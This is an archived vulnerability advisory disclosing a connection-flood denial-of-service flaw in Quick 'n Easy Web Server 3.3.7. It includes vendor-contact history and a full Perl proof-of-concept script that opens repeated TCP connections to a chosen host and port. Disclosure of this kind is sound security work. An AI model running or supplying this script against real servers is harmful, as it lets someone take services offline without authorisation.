AOH :: HP Unsorted Q :: B1A-1629.HTM

Quick 'n Easy WEB Server DoS



Quick 'n Easy WEB Server DoS
Quick 'n Easy WEB Server DoS



[DCA-0008]

[Software]

 - Quick 'n Easy WEB Server

[Vendor Product Description]

 - Do you want run your own personal webserver or just want to test
your ASP/PHP scripts before you upload them to your webhosting server?
No problem, Quick =92n Easy Web Server can handle it!
Quick =91n Easy Web Server for Windows 98/NT/XP/2003 and Vista(32 bits)
is very easy to configure, it supports native ASP (no need to install
IIS!) and it looks pretty cool too!

[Bug Description]

 - Quick 'n Easy Web Server can't handle multiple/simultaneous
connections leading to Denial-of-Service

[History]

 - Advisory sent to vendor on 06/14/2010.
 - No response from vendor
 - Public advisory & exploit 08/02/2010.

[Impact]

 - Low

[Affected Version]

 - Quick 'n Easy WEB Server v3.3.7
 - Prior versions may also be vulnerable

[Code]

#!/usr/bin/perl
use IO::Socket;

        if (@ARGV < 1) {
                usage();
        }

        $ip     = $ARGV[0];
        $port   = $ARGV[1];
        $conn   = $ARGV[2];

        $num    = 0;

        print "[+] Sending request...\n";

        while ( $num <= $conn ) {
                system("echo -n .");
                $s = IO::Socket::INET->new(Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";

        close($s);
        $num++;
        }

        print "\n[+] Done!\n";

sub usage() {
        print "[-] Usage: <". $0 .">   \n";
        print "[-] Example: ". $0 ." 127.0.0.1 80 1200\n";
        exit;
}


[Credits]

Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br 


[Greetz]
Crash and all Dclabs members.

-- 
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.